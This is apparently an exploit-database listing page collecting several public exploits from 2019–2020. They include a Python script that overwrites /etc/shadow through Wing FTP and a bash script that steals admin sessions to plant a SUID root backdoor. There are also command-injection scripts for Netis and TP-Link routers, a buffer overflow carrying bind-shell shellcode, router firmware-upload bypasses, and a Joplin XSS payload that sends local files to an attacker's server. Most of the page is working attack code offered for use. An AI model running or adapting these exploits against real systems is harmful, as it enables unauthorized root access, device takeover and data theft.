Wing FTP Server version 6.2.3 suffers from a privilege escalation vulnerability.

MD5 | 55e0bd61fc7c43fec8d097e8ee28ba40

# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation
# Google Dork: intitle:"Wing FTP Server - Web"
# Date: 2020-03-02
# Exploit Author: Cary Hooper
# Vendor Homepage: https://www.wftpserver.com
# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
# Version: v6.2.3
# Tested on: Ubuntu 18.04, Kali Linux 4, MacOS Catalina, Solaris 11.4 (x86)


# Given SSH access to a target machine with Wing FTP Server installed, this program:
# - SSH in, forges a FTP user account with full permissions (CVE-2020-8635)
# - Logs in to HTTP interface and then edits /etc/shadow (resulting in CVE-2020-8634)
# Each step can all be done manually with any kind of code execution on target (no SSH)
# To setup, start SSH service, then run ./wftpserver. Wing FTP services will start after a domain is created.
# https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php (writeup)


#!/usr/bin/python3

#python3 cve-2020-8635.py -t 192.168.0.2:2222 -u lowleveluser -p demo --proxy http://127.0.0.1:8080

import paramiko,sys,warnings,requests,re,time,argparse
#Python warnings are the worst
warnings.filterwarnings("ignore")

#Argument handling begins
parser = argparse.ArgumentParser(description="Exploit for Wing FTP Server v6.2.3 Local Privilege Escalation",epilog=print(f"Exploit by @nopantrootdance."))
parser.add_argument("-t", "--target", help="hostname of target, optionally with port specified (hostname:port)",required=True)
parser.add_argument("-u", "--username", help="SSH username", required=True)
parser.add_argument("-p", "--password", help="SSH password", required=True)
parser.add_argument("-v", "--verbose", help="Turn on debug information", action='store_true')
parser.add_argument("--proxy", help="Send HTTP through a proxy",default=False)
args = parser.parse_args()

#Global Variables
global username
global password
global proxies
global port
global hostname
global DEBUG
username = args.username
password = args.password

#Turn on debug statements
if args.verbose:
DEBUG = True
else:
DEBUG = False

#Handle nonstandard SSH port
if ':' in args.target:
socket = args.target.split(':')
hostname = socket[0]
port = socket[1]
else:
hostname = args.target
port = "22"

#Prepare proxy dict (for Python requests)
if args.proxy:
if ("http://" not in args.proxy) and ("https://" not in args.proxy):
print(f"[!] Invalid proxy. Proxy must have http:// or https:// {proxy}")
sys.exit(1)
proxies = {'http':args.proxy,'https':args.proxy}
else:
proxies = {}
#Argument handling ends

#This is what a .xml file looks like.
#Gives full permission to user (h00p:h00p) for entire filesystem '/'.
#Located in $_WFTPROOT/Data/Users/
evilUserXML = """


h00p
1
1
d28f47c0483d392ca2713fe7e6f54089
63
0
2020-02-25 18:27:07
0
0
0
0
5
5
0
0
0
0
0
0
0

0
1
1
0
1
1
0
0
0
0
0







0
0
0
0
0
0
0
1580092048
0
0
0
0
0
0
0

2020-01-26 18:27:28
0

/
/
1
1
1
1
1
1
1
1
1
1
1
1



"""

#Verbosity function.
def log(string):
if DEBUG != False:
print(string)

#Checks to see which URL is hosting Wing FTP
#Returns a URL, probably. HTTPS preferred. empty url is checked in main()
def checkHTTP(hostname):
protocols= ["http://","https://"]
for protocol in protocols:
try:
log(f"Testing HTTP service {protocol}{hostname}")
response = requests.get(protocol + hostname, verify=False, proxies=proxies)
try:
#Server: Wing FTP Server
if "Wing FTP Server" in response.headers['Server']:
print(f"[!] Wing FTP Server found at {protocol}{hostname}")
url = protocol + hostname
except:
print("")
except Exception as e:
print(f"[*] Server is not running Wing FTP web services on {protocol}: {e}")
return url

#Log in to the HTTP interface. Returns cookie
def getCookie(url,webuser,webpass,headers):
log("getCookie")
loginURL = f"{url}/loginok.html"
data = {"username": webuser, "password": webpass, "username_val": webuser, "remember": "true", "password_val": webpass, "submit_btn": " Login "}
response = requests.post(loginURL, headers=headers, data=data, verify=False, proxies=proxies)
ftpCookie = response.headers['Set-Cookie'].split(';')[0]
print(f"[!] Successfully logged in! Cookie is {ftpCookie}")
cookies = {"UID":ftpCookie.split('=')[1]}
log("return getCookie")
return cookies

#Change directory within the web interface.
#The actual POST request changes state. We keep track of that state in the returned directorymem array.
def chDir(url,directory,headers,cookies,directorymem):
log("chDir")
data = {"dir": directory}
print(f"[*] Changing directory to {directory}")
chdirURL = f"{url}/chdir.html"
requests.post(chdirURL, headers=headers, cookies=cookies, data=data, verify=False, proxies=proxies)
log(f"Directorymem is nonempty. --> {directorymem}")
log("return chDir")
directorymem = directorymem + "|" + directory
return directorymem

#The application has a silly way of keeping track of paths.
#This function returns the current path as dirstring.
def prepareStupidDirectoryString(directorymem,delimiter):
log("prepareStupidDirectoryString")
dirstring = ""
directoryarray = directorymem.split('|')
log(f"directoryarray is {directoryarray}")
for item in directoryarray:
if item != "":
dirstring += delimiter + item
log("return prepareStupidDirectoryString")
return dirstring

#Downloads a given file from the server. By default, it runs as root.
#Returns the content of the file as a string.
def downloadFile(file,url,headers,cookies,directorymem):
log("downloadFile")
print(f"[*] Downloading the {file} file...")
dirstring = prepareStupidDirectoryString(directorymem,"$2f") #Why wouldn't you URL-encode?!
log(f"directorymem is {directorymem} and dirstring is {dirstring}")
editURL = f"{url}/editor.html?dir={dirstring}&filename={file}&r=0.88304407485768"
response = requests.get(editURL, cookies=cookies, verify=False, proxies=proxies)
filecontent = re.findall(r'',response.text,re.DOTALL)[0]
log(f"downloaded file is: {filecontent}")
log("return downloadFile")
return filecontent,editURL

#Saves a given file to the server (or overwrites one). By default it saves a file with
#644 permission owned by root.
def saveFile(newfilecontent,file,url,headers,cookies,referer,directorymem):
log("saveFile")
log(f"Directorymem is {directorymem}")
saveURL = f"{url}/savefile.html"
headers = {"Content-Type": "text/plain;charset=UTF-8", "Referer": referer}
dirstring = prepareStupidDirectoryString(directorymem,"/")
log(f"Stupid Directory string is {dirstring}")
data = {"charcode": "0", "dir": dirstring, "filename": file, "filecontent": newfilecontent}
requests.post(saveURL, headers=headers, cookies=cookies, data=data, verify=False)
log("return saveFile")

#Other methods may be more stable, but this works.
#"You can't argue with a root shell" - FX
#Let me know if you know of other ways to increase privilege by overwriting or creating files. Another way is to overwrite
#the Wing FTP admin file, then leverage the lua interpreter in the administrative interface which runs as root (YMMV).
#Mind that in this version of Wing FTP, files will be saved with umask 111. This makes changing /etc/sudoers infeasible.

#This routine overwrites the shadow file
def overwriteShadow(url):
log("overwriteShadow")
headers = {"Content-Type": "application/x-www-form-urlencoded"}
#Grab cookie from server.
cookies = getCookie(url=url,webuser="h00p",webpass="h00p",headers=headers)

#Chdir a few times, starting in the user's home directory until we arrive at the target folder
directorymem = chDir(url=url,directory="etc",headers=headers,cookies=cookies,directorymem="")

#Download the target file.
shadowfile,referer = downloadFile(file="shadow",url=url,headers=headers,cookies=cookies,directorymem=directorymem)

# openssl passwd -1 -salt h00ph00p h00ph00p
rootpass = "$1$h00ph00p$0cUgaHnnAEvQcbS6PCMVM0"
rootpass = "root:" + rootpass + ":18273:0:99999:7:::"

#Create new shadow file with different root password & save
newshadow = re.sub("root(.*):::",rootpass,shadowfile)
print("[*] Swapped the password hash...")
saveFile(newfilecontent=newshadow,file="shadow",url=url,headers=headers,cookies=cookies,referer=referer,directorymem=directorymem)
print("[*] Saved the forged shadow file...")
log("exit overwriteShadow")

def main():
log("main")
try:
#Create ssh connection to target with paramiko
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
try:
client.connect(hostname, port=port, username=username, password=password)
except:
print(f"Failed to connect to {hostname}:{port} as user {username}.")

#Find wftpserver directory
print(f"[*] Searching for Wing FTP root directory. (this may take a few seconds...)")
stdin, stdout, stderr = client.exec_command("find / -type f -name 'wftpserver'")
wftpDir = stdout.read().decode("utf-8").split('n')[0].rsplit('/',1)[0]
print(f"[!] Found Wing FTP directory: {wftpDir}")
#Find name of
stdin, stdout, stderr = client.exec_command(f"find {wftpDir}/Data/ -type d -maxdepth 1")
lsresult = stdout.read().decode("utf-8").split('n')
#Checking if wftpserver is actually configured. If you're using this script, it probably is.
print(f"[*] Determining if the server has been configured.")
domains = []
for item in lsresult[:-1]:
item = item.rsplit('/',1)[1]
if item !="_ADMINISTRATOR" and item != "":
domains.append(item)
print(f"[!] Success. {len(domains)} domain(s) found! Choosing the first: {item}")
domain = domains[0]
#Check if the users folder exists
userpath = wftpDir + "/Data/" + domain
print(f"[*] Checking if users exist.")
stdin, stdout, stderr = client.exec_command(f"file {userpath}/users")
if "No such file or directory" in stdout.read().decode("utf-8"):
print(f"[*] Users directory does not exist. Creating folder /users")
#Create users folder
stdin, stdout, stderr = client.exec_command(f"mkdir {userpath}/users")
#Create user.xml file
print("[*] Forging evil user (h00p:h00p).")
stdin, stdout, stderr = client.exec_command(f"echo '{evilUserXML}' > {userpath}/users/h00p.xml")
#Now we can log into the FTP web app with h00p:h00p

url = checkHTTP(hostname)
#Check that url isn't an empty string (and that its a valid URL)
if "http" not in url:
print(f"[!] Exiting... cannot access web interface.")
sys.exit(1)

#overwrite root password
try:
overwriteShadow(url)
print(f"[!] Overwrote root password to h00ph00p.")
except Exception as e:
print(f"[!] Error: cannot overwrite /etc/shadow: {e}")

#Check to make sure the exploit worked.
stdin, stdout, stderr = client.exec_command("cat /etc/shadow | grep root")
out = stdout.read().decode('utf-8')
err = stderr.read().decode('utf-8')

log(f"STDOUT - {out}")
log(f"STDERR - {err}")
if "root:$1$h00p" in out:
print(f"[*] Success! The root password has been successfully changed.")
print(f"ntssh {username}@{hostname} -p{port}")
print(f"tThen: su root (password is h00ph00p)")
else:
print(f"[!] Something went wrong... SSH in to manually check /etc/shadow. Permissions may have been changed to 666.")

log("exit prepareServer")
finally:
client.close()

main()

Source

Intelbras Wireless N 150Mbps WRN240 suffers from a configuration upload authentication bypass vulnerability.

MD5 | 08f181f9560eb9e4a94a4d1854dc1d20

# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.intelbras.com/
# Software Link: http://en.intelbras.com.br/node/1033
# Version: Intelbras Wireless N 150Mbps - WRN240
# Tested on: linux, windows
# CVE: CVE-2019-19142

Intelbras WRN240 devices do not require authentication to replace the
firmware via a POST request to the incoming/Firmware.cfg URI.

REFS:
https://fireshellsecurity.team/hack-n-routers/
https://github.com/ElberTavares/routers-exploit/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin
http://192.1680.1/incoming/RouterBakCfgUpload.cfg

Source

Netis WF2419 version 2.2.36123 suffers from a remote code execution vulnerability.

MD5 | dbd50affdbcb32ab1bb41adb5453cfeb

# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution 
# Exploit Author: Elias Issa
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
# Date: 2020-02-11
# Version: WF2419 V2.2.36123 => V2.2.36123
# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
# CVE : CVE-2019-19356


# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"

#!/usr/bin/env python
import argparse
import requests
import json

def exploit(host,cmd):
# Send Payload
headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',
'Content-Type': 'application/x-www-form-urlencoded'}
post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0"
vulnerable_page = host + "/cgi-bin-igd/netcore_set.cgi"
req_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)
print('[+] Payload sent')
try :
json_data = json.loads(req_payload.text)
if json_data[0] == "SUCCESS":
print('[+] Exploit Sucess')
# Get Command Result
print('[+] Getting Command Outputn')
result_page = host + "/cgi-bin-igd/netcore_get.cgi"
post_data = "mode_name=netcore_get&no=no"
req_result = requests.post(result_page, data=post_data, headers=headers_value)
json_data = json.loads(req_result.text)
results = json_data["tools_results"]
print results.replace(';', 'n')
else:
print('[-] Exploit Failed')
except:
print("[!] You might need to login.")

# To be implemented
def login(user, password):
print('To be implemented')

def main():
host = args.host
cmd = args.cmd
user = args.user
password = args.password
#login(user,password)
exploit(host,cmd)

if __name__ == "__main__":
ap = argparse.ArgumentParser(
description="Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]")
ap.add_argument("host", help="URL (Example: http://192.168.1.1).")
ap.add_argument("cmd", help="Command to run.")
ap.add_argument("-u", "--user", help="Admin username (Default: admin).",
default="admin")
ap.add_argument("-p", "--password", help="Admin password (Default: admin).",
default="admin")
args = ap.parse_args()
main()

Source

Cyberoam Authentication Client version 2.1.2.7 suffers from a buffer overflow vulnerability.

MD5 | eddba6d1362143102912cf298aa013f1

# Exploit Title: Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)
# Date: 2020-02-28
# Exploit Author: Andrey Stoykov
# Version: Cyberoam General Authentication Client 2.1.2.7
# Tested on: Windows Vista SP2 x86

Steps to Reproduce:

1) Run the POC
2) Copy the contents of "sploit.txt" into the "Cyberoam Server Address" and click "Check"
3) Bind TCP shell should spawn on port 1337

# Badchars to be avoided: "x0ax00x0dx01x02x03x04"
# msfvenom -p windows/shell_bind_tcp -f c -b "x0ax00x0dx01x02x03x04" lport=1337 -e x86/alpha_mixed

Exploit POC:

shellcode = ("x89xe6xddxc5xd9x76xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x49x6cx6ax48x4ex62x77x70x43x30x67x70x43x50x6f"
"x79x6dx35x66x51x6fx30x71x74x6ex6bx42x70x66x50"
"x6ex6bx30x52x34x4cx6ex6bx76x32x32x34x4ex6bx30"
"x72x64x68x46x6fx6dx67x43x7ax54x66x70x31x39x6f"
"x4ex4cx77x4cx71x71x33x4cx46x62x66x4cx37x50x4b"
"x71x38x4fx54x4dx46x61x49x57x49x72x79x62x72x72"
"x71x47x6cx4bx43x62x74x50x4ex6bx70x4ax55x6cx6c"
"x4bx50x4cx77x61x73x48x4ax43x43x78x35x51x6ax71"
"x43x61x6cx4bx30x59x77x50x35x51x4ex33x6ex6bx33"
"x79x67x68x69x73x64x7ax77x39x6cx4bx75x64x4ex6b"
"x75x51x4ax76x66x51x59x6fx4ex4cx5ax61x58x4fx66"
"x6dx47x71x4ax67x45x68x49x70x73x45x59x66x47x73"
"x71x6dx68x78x67x4bx61x6dx76x44x62x55x78x64x70"
"x58x4ex6bx72x78x34x64x53x31x4ex33x52x46x6cx4b"
"x66x6cx52x6bx4cx4bx76x38x67x6cx73x31x5ax73x4c"
"x4bx34x44x6ex6bx57x71x6ax70x4ex69x33x74x36x44"
"x56x44x33x6bx71x4bx70x61x31x49x50x5ax46x31x69"
"x6fx79x70x53x6fx63x6fx30x5ax6ex6bx64x52x5ax4b"
"x4cx4dx61x4dx35x38x55x63x75x62x37x70x77x70x53"
"x58x62x57x71x63x76x52x43x6fx71x44x55x38x30x4c"
"x72x57x31x36x64x47x39x6fx69x45x4ex58x5ax30x75"
"x51x33x30x47x70x46x49x4bx74x42x74x32x70x30x68"
"x36x49x6dx50x50x6bx57x70x4bx4fx69x45x31x7ax53"
"x38x70x59x72x70x4ax42x39x6dx73x70x70x50x43x70"
"x66x30x42x48x6bx5ax36x6fx49x4fx4bx50x49x6fx79"
"x45x4cx57x42x48x75x52x45x50x35x55x35x69x4ex69"
"x4ax46x51x7ax52x30x62x76x36x37x50x68x4bx72x59"
"x4bx55x67x55x37x79x6fx4ax75x70x57x71x78x68x37"
"x79x79x67x48x79x6fx6bx4fx4ex35x33x67x43x58x63"
"x44x6ax4cx75x6bx4bx51x39x6fx49x45x32x77x6dx47"
"x52x48x70x75x70x6ex30x4dx53x51x79x6fx6bx65x31"
"x78x63x53x50x6dx42x44x67x70x6fx79x49x73x73x67"
"x72x77x62x77x64x71x4ax56x32x4ax54x52x46x39x33"
"x66x4ax42x79x6dx32x46x7ax67x50x44x71x34x75x6c"
"x67x71x56x61x6ex6dx33x74x51x34x52x30x38x46x53"
"x30x67x34x43x64x30x50x46x36x32x76x42x76x77x36"
"x53x66x72x6ex42x76x50x56x43x63x36x36x71x78x53"
"x49x68x4cx77x4fx6cx46x79x6fx49x45x6dx59x4dx30"
"x50x4ex70x56x63x76x79x6fx46x50x71x78x66x68x6d"
"x57x75x4dx55x30x69x6fx79x45x4fx4bx58x70x58x35"
"x4fx52x71x46x52x48x6cx66x6dx45x4dx6dx6fx6dx6b"
"x4fx69x45x75x6cx74x46x63x4cx47x7ax6bx30x59x6b"
"x39x70x31x65x77x75x6fx4bx72x67x62x33x50x72x30"
"x6fx42x4ax77x70x72x73x79x6fx59x45x41x41")

buffer = "A"*216 + "xebx10x90x90"+ "x97x44x9cx0f" + "x90"*500 + shellcode
buffer += "B"*(16688-216-8-500)
f = open('sploit.txt', 'w')
f.write(buffer)
f.close()

Source

TP-Link TL-WR849N version 0.9.1 4.16 suffers from a firmware upload authentication bypass vulnerability.

MD5 | 5fc10515451b2b85ebfa1e9f129e6190

# Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-CVE-2019-19143

Uploading new firmware without access to the panel

REFS:
https://github.com/ElberTavares/routers-exploit/tp-link
https://fireshellsecurity.team/hack-n-routers/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://TARGET/mainFrame.htm" -F data=@conf.bin
http://TARGET/cgi/confup

Source

WordPress Tutor LMS plugin version 1.5.3 suffers from a cross site request forgery vulnerability.

MD5 | a3195f351910c4acd40c82f3afff25c6

# Exploit Title: WordPress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615

# 1. Description

# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses.
# An attacker can use CSRF to register themselves as an instructor or block other legit instructors.
# Consequently, if the option to create courses without admin approval is enabled on the plugin’s settings
# page, the attacker will be able to create courses directly as well. All WordPress websites
# using Tutor LMS version 1.5.2 and below are affected.

# 2. Proof of Concept

# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF
# attack to approve an attacker-controlled instructor account can be performed by having the admin
# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly,
# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked
# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.

# CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor
# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval.
# This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is
# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can
# be tricked into visiting the link and triggering the request to add an instructor.



history.pushState('', '', '/')
















3. Timeline

Vulnerability reported to the Tutor LMS team – January 30, 2020.
Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.

Source

TP-Link TL-WR849N suffers from a remote code execution vulnerability.

MD5 | edfc7196db196658aa9ca7bde6deb539

# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-2020-9374


import requests

def output(headers,cookies):
url = 'http://192.168.0.1/cgi?1'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3x0dx0a'
data += 'diagnosticsStatex0dx0a'
data += 'X_TP_HopSeqx0dx0a'
data += 'X_TP_Resultx0dx0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
saida = r.text
filtro = saida.replace(': Name or service not known','')
filtro = filtro.replace('[0,0,0,0,0,0]0','')
filtro = filtro.replace('diagnosticsState=','')
filtro = filtro.replace('X_TP_HopSeq=0','')
filtro = filtro.replace('X_TP_Result=','')
print(filtro[:-8])

def aceppt(headers,cookies):
url = 'http://192.168.0.1/cgi?7'
data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0x0dx0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
output(headers,cookies)


def inject(command,headers,cookies):
url = 'http://192.168.0.1/cgi?2'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8x0dx0a'
data += 'maxHopCount=20x0dx0a'
data += 'timeout=5x0dx0a'
data += 'numberOfTries=1x0dx0a'
data += 'host="$('+command+')"x0dx0a'
data += 'dataBlockSize=64x0dx0a'
data += 'X_TP_ConnName=ewan_pppoex0dx0a'
data += 'diagnosticsState=Requestedx0dx0a'
data += 'X_TP_HopSeq=0x0dx0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
aceppt(headers,cookies)



def main():
cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
headers = {'Content-Type': 'text/plain',
'Referer': 'http://192.168.0.1/mainFrame.htm'}
while True:
command = input('$ ')
inject(command,headers,cookies)


main()

Source

Wing FTP Server version 6.2.5 suffers from a privilege escalation vulnerability.

MD5 | 94c9cff08d8ed9f26e94d37311beaa3f

# Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation
# Google Dork: intitle:"Wing FTP Server - Web"
# Date: 2020-03-03
# Exploit Author: Cary Hooper
# Vendor Homepage: https://www.wftpserver.com
# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
# Version: v6.2.5 and prior
# Tested on: Ubuntu 18.04
# CVE: N/A

# If $_WINGFTPDIR is the installation directory where Wing FTP was installed,
# $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable)
# $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable.
# We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA.
# https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php (writeup)



#!/bin/bash

echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)'
echo 'Exploit by Cary Hooper (@nopantrootdance)'

function writeBackdoor() {
#this function creates a backdoor program (executes bash)
echo " Writing backdoor in $1"
echo '#include ' > $1/foobarh00p.c
echo '#include ' >> $1/foobarh00p.c
echo '#include ' >> $1/foobarh00p.c
echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c
gcc -w $1/foobarh00p.c -o $1/foobarh00p
}

function makeRequest() {
#Executes Lua command in admin panel to set the suid bit/chown on our backdoor
#Change owner to root
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null
#Make SUID
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null
}

directories=( "/tmp" "/var/tmp" "/dev/shm" )
for dir in "${directories[@]}"
do
#Check if directories are writeable
if [ -w $dir ]
then
echo "[!] Writeable directory found: $dir"
export backdoordir=$dir
break
else
echo " $dir is not writeable..."; fi
done

writeBackdoor $backdoordir

#Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/).
echo " Finding the wftpserver directory"
export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver)
if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found. Consider looking manually."; exit 1; fi
#Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary. Change the variable below and comment out the code above.
#export sessiondir="/opt/wftpserver/session_admin"

#While loop to wait for an admin session to be established.
echo " Waiting for a Wing FTP admin to log in. This may take a while..."
count=0
while : ; do
if [ "$(ls -A $sessiondir)" ]; then
#If a session file exists, the UID_ADMIN cookie is the name of the file.
echo "[!] An administrator logged in... stealing their session."
export cookie=$(ls -A $sessiondir | cut -d '.' -f1)
export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1)
echo " Changing IP restrictions on the cookie..."
cat $sessiondir/$cookie.lua | sed "s/$ip/127.0.0.1/g" > $backdoordir/$cookie.lua
cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua
rm $backdoordir/$cookie.lua
echo "[!] Successfully stole session."
#Once found, make the malicious curl request
export urldir=$(sed "s///%2F/g" <<<$backdoordir)
echo " Making evil request as Wing FTP admin... (backdoor in ${backdoordir})"
makeRequest $cookie $urldir
break
else
#Checks every 10 seconds. Outputs date to terminal for user feedback purposes only.
sleep 10
let "count+=1"
if [ $count -eq 10 ]; then date; fi
echo "..."
fi
done

#Check if backdoor was created correctly
if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo " Something went wrong. Backdoor is not SUID"; exit 1; fi
if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo " Something went wrong. Backdoor is not owned by root"; exit 1; fi

echo " Backdoor is now SUID owned by root."
echo "[!] Executing backdoor. Cross your fingers..."
#Execute the backdoor... root!
$backdoordir/foobarh00p

Source

Joplin Desktop version 1.0.184 suffers from a cross site scripting vulnerability.

MD5 | a39577ab43a6ccb0a439fe8666c863ac

# Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Date: 2020-02-27
# Vendor: Laurent Cozic
# Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip
# Affected Version: 1.0.184 and before
# Patched Version: 1.0.185
# Category: Remote
# Platform: Windows
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/79.html
# CVE: 2020-9038
# References:
# https://github.com/JavierOlmedo/CVE-2020-9038
# https://github.com/laurent22/joplin/commit/3db47b575b9cb0a765da3d283baa2c065df0d0bc

# 1. Technical Description
# Joplin Desktop version 1.0.184 and before are affected by Cross-Site Scripting
# vulnerability through the malicious note. This allows a malicious user
# read arbitrary files of system.

# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection in evil machine (you can use a python server).

python -m SimpleHTTPServer 8080

# 2.2 Upload exploit.js file to your web server (Change your IP, PORT and USER)

function readTextFile(file){
var rawFile = new XMLHttpRequest();
rawFile.open("GET", file, false);
rawFile.onreadystatechange = function (){
if(rawFile.readyState === 4){
if(rawFile.status === 200 || rawFile.status == 0){
allText = rawFile.responseText;
//alert(allText);
var img = document.createElement('img');
img.src = "http://[IP:PORT]/" + allText;
document.body.appendChild(img)
}
}
}
rawFile.send(null);
}
readTextFile("file:///C:/Users/[USER]/Desktop/SECRET.TXT");
//readTextFile("file:///C:/Windows/System32/drivers/etc/hosts");

# 2.3 Create a secret.txt file with any content in victim desktop.

# 2.4 Create a New note in Joplin Desktop and copy next payload in note body content (change your base64).

<img src onerror=eval(atob("dmFyIHNjcmlwdD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3J
pcHQiKTtzY3JpcHQudHlwZT0idGV4dC9qYXZhc2NyaXB0IjtzY3JpcHQuc3JjPSJodHRwOi8vMTkyLjE2O
C4xMDAuNjk6ODA4MC9leHBsb2l0LmpzIjtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCI
pWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk="))>



# 2.5 Your web server will receive a request with the contents of the secret.txt file

Serving HTTP on 0.0.0.0 port 8080 ...
192.168.100.250 - - [02/Feb/2020 08:27:22] "GET /exploit.js HTTP/1.1" 200 -
192.168.100.250 - - [02/Feb/2020 08:27:27] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -

# 3. Timeline
# 20, december 2019 - [RESEARCHER] Discover
# 20, december 2019 - [RESEARCHER] Report to vendor support
# 21, december 2019 - [DEVELOPER] Recognized vulnerability
# 13, february 2020 - [DEVELOPER] Patched vulnerability
# 27, february 2020 - [RESEARCHER] Public disclosure

# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo

Source

MITREid versions 1.3.3 and below suffer from a cross site scripting vulnerability.

MD5 | 4af01c468a0b4372b4ec0d37a9c3cbb6

MITREid Connect OpenID-Connect-Java-Spring-Server
version
1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is
included in *topbar.tag* and *header.tag* without being sanitized. A user
can set their name to a value like:

Testalert(1)

Which will be included in JSON used by a JavaScript function in *header.tag*
:

// get the info of the current user, if available (null otherwise)
> function getUserInfo() {
> return {"sub":"12318767","name":"
> *Testalert(1)*
> Test","preferred_username":"Test","given_name":"Testalert(1)","family_name":"Test","email":"
> test@test.com","email_verified":true};}


